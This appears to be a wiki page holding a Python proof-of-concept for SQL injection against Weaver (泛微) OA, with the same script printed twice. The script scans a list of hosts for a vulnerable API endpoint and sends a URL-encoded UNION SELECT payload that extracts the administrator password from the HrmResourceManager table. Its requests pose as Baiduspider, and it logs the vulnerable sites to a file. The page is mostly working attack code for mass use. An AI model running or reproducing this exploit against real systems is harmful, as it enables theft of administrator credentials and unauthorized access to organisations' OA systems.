泛微OA-Sql注入POC.py

fofamini-wiki

登录白背景

源码

import requests
from time import sleep

headers = {
    "UserAgent": "Mozilla/5.0(compatible;Baiduspiderrender/2.0;+http://www.baidu.com/search/spider.html)"
}


def FingerPrint():
    urls = open('urls.txt', 'r', encoding="utf-8")
    for url_list in urls:
        try:
            pay = "/api/ec/dev/locale/getLabelByModule"
            url = "http://" + url_list.replace("\n", "") + pay
            response = requests.get(url, headers=headers, timeout=20)
            if response.status_code == 200:
                f = open("probable.txt", "a", encoding="utf-8")
                urlf = url + "\n"
                f.write(urlf)
                print(url, "写入成功!\n")
            else:
                print(url, "不属于存在漏洞的版本\n")
        except BaseException:
            print("请检查您调用文本是否正确,报错函数:FingerPrint()")


def SQL_injection():
    urls = open('probable.txt', 'r', encoding='utf-8')
    for url_list in urls:
        try:
            payload = "?moduleCode=%61%61%61%27%29%20%75%6e%69%6f%6e%20%61%6c%6c%20%73%65%6c%65%63%74%20%27%31%31%31%2c%27%2b%20%28%73%65%6c%65%63%74%20%70%61%73%73%77%6f%72%64%20%66%72%6f%6d%20%48%72%6d%52%65%73%6f%75%72%63%65%4d%61%6e%61%67%65%72%20%77%68%65%72%65%20%69%64%3d%31%29%20%2d%2d"
            url = url_list.replace("\n", "") + payload
            response = requests.get(url, headers=headers, timeout=20).json()
            if response['datas'] == "111":
                f = open("IsSqlI.txt", "a", encoding="utf-8")
                urlf = url + "\n"
                f.write(urlf)
                print(url_list.replace("\n",""), "写入成功!\n")
            else:
                print(url_list.replace("\n",""), "不存在SQL注入漏洞!\n")
        except BaseException:
            print("可能站点不存在SQL注入返回数据有误导致报错!报错函数:SQL_injection(),报错可忽略")


if __name__ == "__main__":
    FingerPrint()
    sleep(1)
    SQL_injection()

import requests
from time import sleep

headers = {
    "UserAgent": "Mozilla/5.0(compatible;Baiduspiderrender/2.0;+http://www.baidu.com/search/spider.html)"
}

def FingerPrint():
    urls = open('urls.txt', 'r', encoding="utf-8")
    for url_list in urls:
        try:
            pay = "/api/ec/dev/locale/getLabelByModule"
            url = "http://" + url_list.replace("\n", "") + pay
            response = requests.get(url, headers=headers, timeout=20)
            if response.status_code == 200:
                f = open("probable.txt", "a", encoding="utf-8")
                urlf = url + "\n"
                f.write(urlf)
                print(url, "写入成功!\n")
            else:
                print(url, "不属于存在漏洞的版本\n")
        except BaseException:
            print("请检查您调用文本是否正确,报错函数:FingerPrint()")

def SQL_injection():
    urls = open('probable.txt', 'r', encoding='utf-8')
    for url_list in urls:
        try:
            payload = "?moduleCode=%61%61%61%27%29%20%75%6e%69%6f%6e%20%61%6c%6c%20%73%65%6c%65%63%74%20%27%31%31%31%2c%27%2b%20%28%73%65%6c%65%63%74%20%70%61%73%73%77%6f%72%64%20%66%72%6f%6d%20%48%72%6d%52%65%73%6f%75%72%63%65%4d%61%6e%61%67%65%72%20%77%68%65%72%65%20%69%64%3d%31%29%20%2d%2d"
            url = url_list.replace("\n", "") + payload
            response = requests.get(url, headers=headers, timeout=20).json()
            if response['datas'] == "111":
                f = open("IsSqlI.txt", "a", encoding="utf-8")
                urlf = url + "\n"
                f.write(urlf)
                print(url_list.replace("\n",""), "写入成功!\n")
            else:
                print(url_list.replace("\n",""), "不存在SQL注入漏洞!\n")
        except BaseException:
            print("可能站点不存在SQL注入返回数据有误导致报错!报错函数:SQL_injection(),报错可忽略")

if __name__ == "__main__":
    FingerPrint()
    sleep(1)
    SQL_injection()